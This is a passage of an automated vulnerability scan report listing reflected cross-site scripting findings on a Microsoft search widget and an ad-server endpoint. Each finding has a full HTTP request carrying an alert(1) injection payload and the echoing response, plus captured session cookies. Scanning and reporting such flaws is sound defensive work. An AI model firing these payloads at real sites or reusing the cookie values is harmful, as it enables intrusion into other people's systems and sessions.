s_vnum=1313879445324%26vn%3D1; mcI=Thu, 28 Jul 2011 23:06:08 GMT; A=I&I=AxUFAAAAAAB+CQAAAIpTytFFhH8oVryAJxM8/w!!&CS=12779V000119p0002h19p00&GO=12; WT_FPC=id=173.193.214.243-3661456592.30151123:lv=1311338483550:ss=1311338373379; msdn=L=1033; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=c7afbaee-3910-41b0-9f73-42c5d519d743&Microsoft.CreationDate=07/23/2011 02:01:25&Microsoft.LastVisitDate=07/23/2011 02:01:25&Microsoft.NumberOfVisits=1&SessionCookie.Id=48B6F0A73328302A2806841DC13E324C; MSID=Microsoft.CreationDate=05/19/2011 01:26:30&Microsoft.LastVisitDate=07/23/2011 02:01:25&Microsoft.VisitStartDate=07/23/2011 02:01:25&Microsoft.CookieId=22aa2f89-ced8-49d1-a8ca-c4379d3e1c05&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=110&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0467-1766-8023-3891; MS0=b6d6365d4e204cf6ab451e30a23dcb6b

Response

HTTP/1.1 200 OK
ntCoent-Length: 12967
Content-Type: application/x-javascript
ETag: 6dc140f09e6918cfe1062fa7d8ed8aba
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP=ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI
Server: CO1VB29
Content-Length: 12967
Cache-Control: public, max-age=43199
Expires: Sat, 23 Jul 2011 14:02:15 GMT
Date: Sat, 23 Jul 2011 02:02:16 GMT
Connection: close
Vary: Accept-Encoding


if (typeof epx_core === 'undefined') {
epx_loaded = false;
epx_core = function(s) {this.s = s;}
epx_core.prototype = {
exec: function(func, checkFunc, retry) {
if (retry) retry++; else retry =
...[SNIP]...
archBox({"allowEmptySearch":false,"appId":"1","boxId":"HeaderSearchTextBox","btnId":"HeaderSearchButton","focusOnInit":false,"maxTerms":null,"minimumTermLength":4,"paramsCallback":null,"queryParams":"&49dd0<img src=a onerror=alert(1)>9604d92119d=1","scopeId":"9","searchLocation":"http:\/\/social.MSDN.microsoft.com\/Search\/en-US","serviceUri":"http:\/\/services.social.microsoft.com\/Search\/","sr":{"close":"Close","searchLabel":"Search MSDN w
...[SNIP]...

3.63. http://i4.services.social.microsoft.com/search/Widgets/SearchBox.jss [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://i4.services.social.microsoft.com
Path:   /search/Widgets/SearchBox.jss

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 84e17<img%20src%3da%20onerror%3dalert(1)>8704c19d382 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 84e17<img src=a onerror=alert(1)>8704c19d382 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /search/Widgets/SearchBox.jss?boxid=HeaderSearchTextBox&btnid=HeaderSearchButton&brand=MSDN&loc=en-us&Refinement=123&watermark=Visual%20Studio&focusOnInit=false&84e17<img%20src%3da%20onerror%3dalert(1)>8704c19d382=1 HTTP/1.1
Host: i4.services.social.microsoft.com
Proxy-Connection: keep-alive
Referer: http://msdn.microsoft.com/en-us/vstudio/ff431702.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=b99db294605ea749842ddaca50c2f3af&HASH=94b2&LV=20115&V=3; _opt_vi_X19C7L9U=1097A557-F243-4650-B6F9-421C7E65E189; MUID=E361C23374E642C998D8ABA7166A75EC; ixpLightBrowser=0; _vis_opt_s=1%7C; s_nr=1307360954509-Repeat; WT_NVR_RU=0=msdn|technet:1=:2=; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1308659407330%7D%2C%22lastinvited%22%3A1308659407330%2C%22userid%22%3A%2213086594073305308045977726579%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; UserState=Returning=False&LastVisit=06/21/2011 12:33:22&UserEBacExpression=+ 0|2 + 1|8 2|1024; MSPartner2=LogUser=fd88dce7-bc7d-4fc7-a268-4d7867c372fa&RegUser=; WRUID=0; R=200000862-6/21/2011 7:34:30|200024632-6/4/2011 17:55:19; _opt_vi_64WS79UG=20593EEE-7467-4B38-8C32-E61C8EEBF7E3; omniID=1306014135034_717c_5c0c_c0f0_565c9892e499; s_vnum=1313879445324%26vn%3D1; mcI=Thu, 28 Jul 2011 23:06:08 GMT; A=I&I=AxUFAAAAAAB+CQAAAIpTytFFhH8oVryAJxM8/w!!&CS=12779V000119p0002h19p00&GO=12; WT_FPC=id=173.193.214.243-3661456592.30151123:lv=1311338483550:ss=1311338373379; s_cc=true; s_sq=%5B%5BB%5D%5D; msdn=L=1033; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=c7afbaee-3910-41b0-9f73-42c5d519d743&Microsoft.CreationDate=07/23/2011 02:01:25&Microsoft.LastVisitDate=07/23/2011 02:07:21&Microsoft.NumberOfVisits=5&SessionCookie.Id=48B6F0A73328302A2806841DC13E324C; MSID=Microsoft.CreationDate=05/19/2011 01:26:30&Microsoft.LastVisitDate=07/23/2011 02:07:21&Microsoft.VisitStartDate=07/23/2011 02:01:25&Microsoft.CookieId=22aa2f89-ced8-49d1-a8ca-c4379d3e1c05&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=114&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0467-1766-8023-3891; MS0=b6d6365d4e204cf6ab451e30a23dcb6b

Response

HTTP/1.1 200 OK
ntCoent-Length: 12991
Content-Type: application/x-javascript
ETag: 4f5e427688f9144d4c7cad56af60cd6a
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP=ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI
Server: CO1VB31
Content-Length: 12991
Cache-Control: public, max-age=43200
Expires: Sat, 23 Jul 2011 14:07:59 GMT
Date: Sat, 23 Jul 2011 02:07:59 GMT
Connection: close
Vary: Accept-Encoding


if (typeof epx_core === 'undefined') {
epx_loaded = false;
epx_core = function(s) {this.s = s;}
epx_core.prototype = {
exec: function(func, checkFunc, retry) {
if (retry) retry++; else retry =
...[SNIP]...
EmptySearch":false,"appId":"1","boxId":"HeaderSearchTextBox","btnId":"HeaderSearchButton","focusOnInit":false,"maxTerms":null,"minimumTermLength":4,"paramsCallback":null,"queryParams":"&Refinement=123&84e17<img src=a onerror=alert(1)>8704c19d382=1","scopeId":"9","searchLocation":"http:\/\/social.MSDN.microsoft.com\/Search\/en-US","serviceUri":"http:\/\/services.social.microsoft.com\/Search\/","sr":{"close":"Close","searchLabel":"Search Visual
...[SNIP]...

3.64. http://ib.adnxs.com/ab [ccd parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /ab

Issue detail

The value of the ccd request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f199c'-alert(1)-'40bc55a6c60 was submitted in the ccd parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ab?enc=mpmZmZmZBUCamZmZmZkFQAAAAKCZmQVAmpmZmZmZBUCamZmZmZkFQBsceZa4RtQh_________398aShOAAAAAPknAAC1AAAAbAEAAAIAAAAAPgcA0WMAAAEAAABVU0QAVVNEANgCWgC4Ck8AiQQBAgUCAQQAAAAACyYycgAAAAA.&tt_code=vert-8&udj=uf%28%27a%27%2C+16736%2C+1311271292%29%3Buf%28%27c%27%2C+98655%2C+1311271292%29%3Buf%28%27r%27%2C+474624%2C+1311271292%29%3Bppv%2814961%2C+%272437651056926727195%27%2C+1311271292%2C+1312480892%2C+98655%2C+25553%29%3B&cnd=!2BuvpQjfggYQgPwcGAAg0ccBMAA4uBVAAEjsAlAAWABgpwZoAHAAeACAAQSIAWaQAQGYAQGgAQGoAQOwAQC5AQAAAKCZmQVAwQEAAACgmZkFQMkBMzMzMzMz9z_ZAQAAAAAAAPA_4AG_Gw..&ccd=!6QTzJwjfggYQgPwcGNHHASAAf199c'-alert(1)-'40bc55a6c60&referrer=http://games.myyearbook.com/&pp=TihpfAALCZUK5XrlDhw2L-bei0ZY082y4KAt_w&pubclick=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBi87SfGkoTpWTLOX1lQev7PBwwMbU9wH4uJ-PG8Cv6u9EABABGAEgADgBUIDH4cQEYMnW8obIo_waggEXY2EtcHViLTczMDY5MTk3MjM4Mjc3NjWyARRnYW1lcy5teXllYXJib29rLmNvbboBCTcyOHg5MF9hc8gBCdoBHGh0dHA6Ly9nYW1lcy5teXllYXJib29rLmNvbS-YAv4DwAIEyAKoqKQZ4AIA6gIXTVlCXzcyOHg5MF9HYW1lc19Ib21lXzKoAwHoAwjoAyfoA54H9QMAAIBM4AQBgAa4raSoqt7Y4JcB%26num%3D1%26sig%3DAOD64_0HV9CyXXRXmldNeY-MsDj6zKvo0g%26client%3Dca-pub-7306919723827765%26adurl%3D HTTP/1.1
Host: ib.adnxs.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://games.myyearbook.com/
Cookie: sess=1; uuid2=6516234360771219075; anj=Kfu=8fG4S]cvjr/?0P(*AuB-u**g1:XIFC`EhzW%<rg(XV)`CZ8D]ccqzB-6O8z_!o8J2McQT/AO0qb`?WerkXHFIP'qdxsQ<=Yls'k00(-!eqSrIt<; icu=ChEIz34QChgBIAEoATDU0qHxBBDU0qHxBBgA; acb731211=5_[r^208WM^9#a*>bPMvSH0.@?enc=AAAAAAAA8D_NzMzMzMzsPwAAAEAzMwNAzczMzMzM7D8AAAAAAADwPzXHfZcqv-B6g472aqBQblpUaShOAAAAAAw8AwA3AQAA3QEAAAIAAABOfgYA510AAAEAAABVU0QAVVNEACwB-gAlDQAA_RABAgUCAQUAAAAApyCfkQAAAAA.&tt_code=cm.yearbook&udj=uf%28%27a%27%2C+1267%2C+1311271252%29%3Buf%28%27c%27%2C+39654%2C+1311271252%29%3Buf%28%27r%27%2C+425550%2C+1311271252%29%3Bppv%281279%2C+%278854287057061529397%27%2C+1311271252%2C+1311876052%2C+39654%2C+24039%29%3Bppv%285150%2C+%278854287057061529397%27%2C+1311271252%2C+1311357652%2C+39654%2C+24039%29%3B&cnd=!whwh7gjmtQIQzvwZGAAg57sBMAE4pRpAAEjdA1CM-AxYAGBLaABwAHgAgAEAiAEAkAEBmAEBoAECqAEDsAEAuQEAAAAAAADwP8EBAAAAAAAA8D_JAZqZmZmZmfE_2QEAAAAAAADwP-ABAA..&ccd=!dAVtLQjmtQIQzvwZGOe7ASAA

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Fri, 22-Jul-2011 18:02:39 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=6516234360771219075; path=/; expires=Wed, 19-Oct-2011 18:02:39 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Thu, 21 Jul 2011 18:02:39 GMT
Content-Length: 1294

document.write('<iframe frameborder="0" width="728" height="90" marginheight="0" marginwidth="0" target="_blank" scrolling="no" src="http://ib.adnxs.com/if?enc=UrgehetR4D9SuB6F61HgPwAAAKCZmQVAmpmZmZmZ
...[SNIP]...
+98655%2C+25553%29%3B&cnd=!2BuvpQjfggYQgPwcGAAg0ccBMAA4uBVAAEjsAlAAWABgpwZoAHAAeACAAQSIAWaQAQGYAQGgAQGoAQOwAQC5AQAAAKCZmQVAwQEAAACgmZkFQMkBMzMzMzMz9z_ZAQAAAAAAAPA_4AG_Gw..&ccd=!6QTzJwjfggYQgPwcGNHHASAAf199c'-alert(1)-'40bc55a6c60&referrer=http://games.myyearbook.com/">
...[SNIP]...

3.65. http://ib.adnxs.com/ab [cnd parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /ab

Issue detail

The value of the cnd request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 47b02'-alert(1)-'8ca7da62f17 was submitted in the cnd parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ab?enc=mpmZmZmZBUCamZmZmZkFQAAAAKCZmQVAmpmZmZmZBUCamZmZmZkFQBsceZa4RtQh_________398aShOAAAAAPknAAC1AAAAbAEAAAIAAAAAPgcA0WMAAAEAAABVU0QAVVNEANgCWgC4Ck8AiQQBAgUCAQQAAAAACyYycgAAAAA.&tt_code=vert-8&udj=uf%28%27a%27%2C+16736%2C+1311271292%29%3Buf%28%27c%27%2C+98655%2C+1311271292%29%3Buf%28%27r%27%2C+474624%2C+1311271292%29%3Bppv%2814961%2C+%272437651056926727195%27%2C+1311271292%2C+1312480892%2C+98655%2C+25553%29%3B&cnd=!2BuvpQjfggYQgPwcGAAg0ccBMAA4uBVAAEjsAlAAWABgpwZoAHAAeACAAQSIAWaQAQGYAQGgAQGoAQOwAQC5AQAAAKCZmQVAwQEAAACgmZkFQMkBMzMzMzMz9z_ZAQAAAAAAAPA_4AG_Gw..47b02'-alert(1)-'8ca7da62f17&ccd=!6QTzJwjfggYQgPwcGNHHASAA&referrer=http://games.myyearbook.com/&pp=TihpfAALCZUK5XrlDhw2L-bei0ZY082y4KAt_w&pubclick=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBi87SfGkoTpWTLOX1lQev7PBwwMbU9wH4uJ-PG8Cv6u9EABABGAEgADgBUIDH4cQEYMnW8obIo_waggEXY2EtcHViLTczMDY5MTk3MjM4Mjc3NjWyARRnYW1lcy5teXllYXJib29rLmNvbboBCTcyOHg5MF9hc8gBCdoBHGh0dHA6Ly9nYW1lcy5teXllYXJib29rLmNvbS-YAv4DwAIEyAKoqKQZ4AIA6gIXTVlCXzcyOHg5MF9HYW1lc19Ib21lXzKoAwHoAwjoAyfoA54H9QMAAIBM4AQBgAa4raSoqt7Y4JcB%26num%3D1%26sig%3DAOD64_0HV9CyXXRXmldNeY-MsDj6zKvo0g%26client%3Dca-pub-7306919723827765%26adurl%3D HTTP/1.1
Host: ib.adnxs.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://games.myyearbook.com/
Cookie: sess=1; uuid2=6516234360771219075; anj=Kfu=8fG4S]cvjr/?0P(*AuB-u**g1:XIFC`EhzW%<rg(XV)`CZ8D]ccqzB-6O8z_!o8J2McQT/AO0qb`?WerkXHFIP'qdxsQ<=Yls'k00(-!eqSrIt<; icu=ChEIz34QChgBIAEoATDU0qHxBBDU0qHxBBgA; acb731211=5_[r^208WM^9#a*>bPMvSH0.@?enc=AAAAAAAA8D_NzMzMzMzsPwAAAEAzMwNAzczMzMzM7D8AAAAAAADwPzXHfZcqv-B6g472aqBQblpUaShOAAAAAAw8AwA3AQAA3QEAAAIAAABOfgYA510AAAEAAABVU0QAVVNEACwB-gAlDQAA_RABAgUCAQUAAAAApyCfkQAAAAA.&tt_code=cm.yearbook&udj=uf%28%27a%27%2C+1267%2C+1311271252%29%3Buf%28%27c%27%2C+39654%2C+1311271252%29%3Buf%28%27r%27%2C+425550%2C+1311271252%29%3Bppv%281279%2C+%278854287057061529397%27%2C+1311271252%2C+1311876052%2C+39654%2C+24039%29%3Bppv%285150%2C+%278854287057061529397%27%2C+1311271252%2C+1311357652%2C+39654%2C+24039%29%3B&cnd=!whwh7gjmtQIQzvwZGAAg57sBMAE4pRpAAEjdA1CM-AxYAGBLaABwAHgAgAEAiAEAkAEBmAEBoAECqAEDsAEAuQEAAAAAAADwP8EBAAAAAAAA8D_JAZqZmZmZmfE_2QEAAAAAAADwP-ABAA..&ccd=!dAVtLQjmtQIQzvwZGOe7ASAA

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Fri, 22-Jul-2011 18:02:35 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=6516234360771219075; path=/; expires=Wed, 19-Oct-2011 18:02:35 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Thu, 21 Jul 2011 18:02:35 GMT
Content-Length: 1294

document.write('<iframe frameborder="0" width="728" height="90" marginheight="0" marginwidth="0" target="_blank" scrolling="no" src="http://ib.adnxs.com/if?enc=UrgehetR4D9SuB6F61HgPwAAAKCZmQVAmpmZmZmZ
...[SNIP]...
2C+1311271292%2C+1312480892%2C+98655%2C+25553%29%3B&cnd=!2BuvpQjfggYQgPwcGAAg0ccBMAA4uBVAAEjsAlAAWABgpwZoAHAAeACAAQSIAWaQAQGYAQGgAQGoAQOwAQC5AQAAAKCZmQVAwQEAAACgmZkFQMkBMzMzMzMz9z_ZAQAAAAAAAPA_4AG_Gw..47b02'-alert(1)-'8ca7da62f17&ccd=!6QTzJwjfggYQgPwcGNHHASAA&referrer=http://games.myyearbook.com/">
...[SNIP]...

3.66. http://ib.adnxs.com/ab [referrer parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /ab

Issue detail

The value of the referrer request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8205e'-alert(1)-'fa7ea69290f was submitted in the referrer parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ab?enc=mpmZmZmZBUCamZmZmZkFQAAAAKCZmQVAmpmZmZmZBUCamZmZmZkFQBsceZa4RtQh_________398aShOAAAAAPknAAC1AAAAbAEAAAIAAAAAPgcA0WMAAAEAAABVU0QAVVNEANgCWgC4Ck8AiQQBAgUCAQQAAAAACyYycgAAAAA.&tt_code=vert-8&udj=uf%28%27a%27%2C+16736%2C+1311271292%29%3Buf%28%27c%27%2C+98655%2C+1311271292%29%3Buf%28%27r%27%2C+474624%2C+1311271292%29%3Bppv%2814961%2C+%272437651056926727195%27%2C+1311271292%2C+1312480892%2C+98655%2C+25553%29%3B&cnd=!2BuvpQjfggYQgPwcGAAg0ccBMAA4uBVAAEjsAlAAWABgpwZoAHAAeACAAQSIAWaQAQGYAQGgAQGoAQOwAQC5AQAAAKCZmQVAwQEAAACgmZkFQMkBMzMzMzMz9z_ZAQAAAAAAAPA_4AG_Gw..&ccd=!6QTzJwjfggYQgPwcGNHHASAA&referrer=http://games.myyearbook.com/8205e'-alert(1)-'fa7ea69290f&pp=TihpfAALCZUK5XrlDhw2L-bei0ZY082y4KAt_w&pubclick=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBi87SfGkoTpWTLOX1lQev7PBwwMbU9wH4uJ-PG8Cv6u9EABABGAEgADgBUIDH4cQEYMnW8obIo_waggEXY2EtcHViLTczMDY5MTk3MjM4Mjc3NjWyARRnYW1lcy5teXllYXJib29rLmNvbboBCTcyOHg5MF9hc8gBCdoBHGh0dHA6Ly9nYW1lcy5teXllYXJib29rLmNvbS-YAv4DwAIEyAKoqKQZ4AIA6gIXTVlCXzcyOHg5MF9HYW1lc19Ib21lXzKoAwHoAwjoAyfoA54H9QMAAIBM4AQBgAa4raSoqt7Y4JcB%26num%3D1%26sig%3DAOD64_0HV9CyXXRXmldNeY-MsDj6zKvo0g%26client%3Dca-pub-7306919723827765%26adurl%3D HTTP/1.1
Host: ib.adnxs.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://games.myyearbook.com/
Cookie: sess=1; uuid2=6516234360771219075; anj=Kfu=8fG4S]cvjr/?0P(*AuB-u**g1:XIFC`EhzW%<rg(XV)`CZ8D]ccqzB-6O8z_!o8J2McQT/AO0qb`?WerkXHFIP'qdxsQ<=Yls'k00(-!eqSrIt<; icu=ChEIz34QChgBIAEoATDU0qHxBBDU0qHxBBgA; acb731211=5_[r^208WM^9#a*>bPMvSH0.@?enc=AAAAAAAA8D_NzMzMzMzsPwAAAEAzMwNAzczMzMzM7D8AAAAAAADwPzXHfZcqv-B6g472aqBQblpUaShOAAAAAAw8AwA3AQAA3QEAAAIAAABOfgYA510AAAEAAABVU0QAVVNEACwB-gAlDQAA_RABAgUCAQUAAAAApyCfkQAAAAA.&tt_code=cm.yearbook&udj=uf%28%27a%27%2C+1267%2C+1311271252%29%3Buf%28%27c%27%2C+39654%2C+1311271252%29%3Buf%28%27r%27%2C+425550%2C+1311271252%29%3Bppv%281279%2C+%278854287057061529397%27%2C+1311271252%2C+1311876052%2C+39654%2C+24039%29%3Bppv%285150%2C+%278854287057061529397%27%2C+1311271252%2C+1311357652%2C+39654%2C+24039%29%3B&cnd=!whwh7gjmtQIQzvwZGAAg57sBMAE4pRpAAEjdA1CM-AxYAGBLaABwAHgAgAEAiAEAkAEBmAEBoAECqAEDsAEAuQEAAAAAAADwP8EBAAAAAAAA8D_JAZqZmZmZmfE_2QEAAAAAAADwP-ABAA..&ccd=!dAVtLQjmtQIQzvwZGOe7ASAA

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Fri, 22-Jul-2011 18:02:43 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=6516234360771219075; path=/; expires=Wed, 19-Oct-2011 18:02:43 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Thu, 21 Jul 2011 18:02:43 GMT
Content-Length: 1294

document.write('<iframe frameborder="0" width="728" height="90" marginheight="0" marginwidth="0" target="_blank" scrolling="no" src="http://ib.adnxs.com/if?enc=UrgehetR4D9SuB6F61HgPwAAAKCZmQVAmpmZmZmZ
...[SNIP]...
QgPwcGAAg0ccBMAA4uBVAAEjsAlAAWABgpwZoAHAAeACAAQSIAWaQAQGYAQGgAQGoAQOwAQC5AQAAAKCZmQVAwQEAAACgmZkFQMkBMzMzMzMz9z_ZAQAAAAAAAPA_4AG_Gw..&ccd=!6QTzJwjfggYQgPwcGNHHASAA&referrer=http://games.myyearbook.com/8205e'-alert(1)-'fa7ea69290f">
...[SNIP]...

3.67. http://ib.adnxs.com/ab [tt_code parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /ab

Issue detail

The value of the tt_code request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5d8c9'-alert(1)-'aca8e4c3d50 was submitted in the tt_code parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ab?enc=mpmZmZmZBUCamZmZmZkFQAAAAKCZmQVAmpmZmZmZBUCamZmZmZkFQBsceZa4RtQh_________398aShOAAAAAPknAAC1AAAAbAEAAAIAAAAAPgcA0WMAAAEAAABVU0QAVVNEANgCWgC4Ck8AiQQBAgUCAQQAAAAACyYycgAAAAA.&tt_code=vert-85d8c9'-alert(1)-'aca8e4c3d50&udj=uf%28%27a%27%2C+16736%2C+1311271292%29%3Buf%28%27c%27%2C+98655%2C+1311271292%29%3Buf%28%27r%27%2C+474624%2C+1311271292%29%3Bppv%2814961%2C+%272437651056926727195%27%2C+1311271292%2C+1312480892%2C+98655%2C+25553%29%3B&cnd=!2BuvpQjfggYQgPwcGAAg0ccBMAA4uBVAAEjsAlAAWABgpwZoAHAAeACAAQSIAWaQAQGYAQGgAQGoAQOwAQC5AQAAAKCZmQVAwQEAAACgmZkFQMkBMzMzMzMz9z_ZAQAAAAAAAPA_4AG_Gw..&ccd=!6QTzJwjfggYQgPwcGNHHASAA&referrer=http://games.myyearbook.com/&pp=TihpfAALCZUK5XrlDhw2L-bei0ZY082y4KAt_w&pubclick=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBi87SfGkoTpWTLOX1lQev7PBwwMbU9wH4uJ-PG8Cv6u9EABABGAEgADgBUIDH4cQEYMnW8obIo_waggEXY2EtcHViLTczMDY5MTk3MjM4Mjc3NjWyARRnYW1lcy5teXllYXJib29rLmNvbboBCTcyOHg5MF9hc8gBCdoBHGh0dHA6Ly9nYW1lcy5teXllYXJib29rLmNvbS-YAv4DwAIEyAKoqKQZ4AIA6gIXTVlCXzcyOHg5MF9HYW1lc19Ib21lXzKoAwHoAwjoAyfoA54H9QMAAIBM4AQBgAa4raSoqt7Y4JcB%26num%3D1%26sig%3DAOD64_0HV9CyXXRXmldNeY-MsDj6zKvo0g%26client%3Dca-pub-7306919723827765%26adurl%3D HTTP/1.1
Host: ib.adnxs.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://games.myyearbook.com/
Cookie: sess=1; uuid2=6516234360771219075; anj=Kfu=8fG4S]cvjr/?0P(*AuB-u**g1:XIFC`EhzW%<rg(XV)`CZ8D]ccqzB-6O8z_!o8J2McQT/AO0qb`?WerkXHFIP'qdxsQ<=Yls'k00(-!eqSrIt<; icu=ChEIz34QChgBIAEoATDU0qHxBBDU0qHxBBgA; acb731211=5_[r^208WM^9#a*>bPMvSH0.@?enc=AAAAAAAA8D_NzMzMzMzsPwAAAEAzMwNAzczMzMzM7D8AAAAAAADwPzXHfZcqv-B6g472aqBQblpUaShOAAAAAAw8AwA3AQAA3QEAAAIAAABOfgYA510AAAEAAABVU0QAVVNEACwB-gAlDQAA_RABAgUCAQUAAAAApyCfkQAAAAA.&tt_code=cm.yearbook&udj=uf%28%27a%27%2C+1267%2C+1311271252%29%3Buf%28%27c%27%2C+39654%2C+1311271252%29%3Buf%28%27r%27%2C+425550%2C+1311271252%29%3Bppv%281279%2C+%278854287057061529397%27%2C+1311271252%2C+1311876052%2C+39654%2C+24039%29%3Bppv%285150%2C+%278854287057061529397%27%2C+1311271252%2C+1311357652%2C+39654%2C+24039%29%3B&cnd=!whwh7gjmtQIQzvwZGAAg57sBMAE4pRpAAEjdA1CM-AxYAGBLaABwAHgAgAEAiAEAkAEBmAEBoAECqAEDsAEAuQEAAAAAAADwP8EBAAAAAAAA8D_JAZqZmZmZmfE_2QEAAAAAAADwP-ABAA..&ccd=!dAVtLQjmtQIQzvwZGOe7ASAA

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Fri, 22-Jul-2011 18:02:21 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=6516234360771219075; path=/; expires=Wed, 19-Oct-2011 18:02:21 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Thu, 21 Jul 2011 18:02:21 GMT
